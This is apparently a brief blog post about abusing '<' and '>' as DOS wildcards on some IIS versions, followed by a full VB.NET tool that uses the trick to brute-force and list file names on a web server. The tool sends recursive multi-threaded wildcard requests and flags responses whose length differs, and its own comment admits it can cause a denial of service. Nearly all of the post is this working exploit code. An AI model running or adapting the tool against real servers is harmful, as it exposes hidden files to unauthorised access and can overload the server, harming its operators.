So, depending on the version of IIS installed on a Server, the “<<” or “>>” can be used as a wildcard for browsing to files. This issue is at the DOS Wildcard level, Src: Stack overflow. I need to add additional information, I’ll edit this post when I get addtional time.
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Public Class Form1 Dim NewLetter As Char Dim MyWebRequest As New Net.WebClient() Dim Extention As String = ".cfm" Dim FileLen As Integer = 0 Dim SleepTime As Integer = 1000 Const WebSite As String = "" Private Sub ExplorePath(ByVal RequestString As String, Optional ByVal LastAscii As Integer = 0) Application.DoEvents() Dim Data As Byte() = Nothing Dim NumberOfFilesFound As Integer = 0 Dim DataLength As Integer = 0 NumberOfFilesFound = 0 Debug.WriteLine("Trying: " & WebSite & RequestString & "<" & Extention) Try If LastAscii = 0 Then Data = MyWebRequest.DownloadData(WebSite & RequestString & "<" & Extention) Else Data = MyWebRequest.DownloadData(WebSite & RequestString & Chr(LastAscii) & "<" & Extention) End If If DataLength <> Data.Length Then If LastAscii = 0 Then ListBox1.Items.Add(RequestString & "<" & Extention) Else ListBox1.Items.Add(RequestString & Chr(LastAscii) & "<" & Extention) Try MyWebRequest.DownloadData(WebSite & RequestString & Chr(LastAscii) & Extention) ListBox1.Items.Add("--[" & RequestString & Chr(LastAscii) & Extention & "]--") Catch ex As Exception End Try ExplorePath(RequestString & ChrW(LastAscii), 48) End If End If Catch ex As Exception DataLength = 0 End Try Select Case LastAscii Case 0 LastAscii = 48 Case 58 LastAscii = 65 'A Case 91 LastAscii = 48 'Zero Return Case Else LastAscii += 1 End Select Threading.Thread.Sleep(SleepTime) ExplorePath(RequestString, LastAscii) End Sub Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click 'THIS CAN DOS THE SYSTEM 'Add a Sleep Command 'Exit Sub Dim MyThread(25) As Threading.Thread Dim MyThreadClass(25) As ThreadClassAction If TextBox2.Text = "" Then For i = 0 To 25 MyThreadClass(i) = New ThreadClassAction MyThreadClass(i).CallBack = Me MyThread(i) = New Threading.Thread(AddressOf MyThreadClass(i).Launch) MyThread(i).Name = Chr(Asc("A") + i) MyThread(i).IsBackground = True MyThread(i).Start() Next Else Extention = TextBox1.Text ExplorePath(TextBox2.Text) MsgBox("Done!") End If End Sub End Class Public Class ThreadClass Public CallBack As Form Public Data As String Public Sub AddListItem1() Form1.ListBox1.Items.Add(Data) End Sub Public Sub AddListItem2() Form1.ListBox2.Items.Add(Data) End Sub End Class Public Class ThreadClassAction Public CallBack As Form Dim MyWebRequest As New Net.WebClient() Private Delegate Sub MyDelPtr() Public Extention As String = ".cfm" Const WebSite As String = "" Public Sub Launch() ExplorePathThread(Threading.Thread.CurrentThread.Name) End Sub Private Sub ExplorePathThread(ByVal RequestString As String, Optional ByVal LastAscii As Integer = 0) Debug.WriteLine("Starting Thread: " & Threading.Thread.CurrentThread.Name) Application.DoEvents() Dim MyThreadClass As New ThreadClass MyThreadClass.CallBack = CallBack Dim MyDel1 = New MyDelPtr(AddressOf MyThreadClass.AddListItem1) Dim MyDel2 = New MyDelPtr(AddressOf MyThreadClass.AddListItem2) Dim Data As Byte() = Nothing Dim NumberOfFilesFound As Integer = 0 Dim DataLength As Integer = 0 NumberOfFilesFound = 0 Debug.WriteLine("Trying: " & WebSite & RequestString & "<" & Extention) Try If LastAscii = 0 Then Data = MyWebRequest.DownloadData(WebSite & RequestString & "<" & Extention) Else Data = MyWebRequest.DownloadData(WebSite & RequestString & Chr(LastAscii) & "<" & Extention) End If If DataLength <> Data.Length Then If LastAscii = 0 Then MyThreadClass.Data = (RequestString & "<" & Extention) CallBack.Invoke(MyDel1) Else MyThreadClass.Data = (RequestString & Chr(LastAscii) & "<" & Extention) CallBack.Invoke(MyDel1) Try MyWebRequest.DownloadData(WebSite & RequestString & Chr(LastAscii) & Extention) MyThreadClass.Data = ("--[" & RequestString & Chr(LastAscii) & Extention & "]--") CallBack.Invoke(MyDel2) Catch ex As Exception End Try ExplorePathThread(RequestString & ChrW(LastAscii), 48) End If End If Catch ex As Exception DataLength = 0 End Try Select Case LastAscii Case 0 LastAscii = 48 Case 58 LastAscii = 65 'A Case 91 LastAscii = 48 'Zero Return Case Else LastAscii += 1 End Select ExplorePathThread(RequestString, LastAscii) End Sub End Class |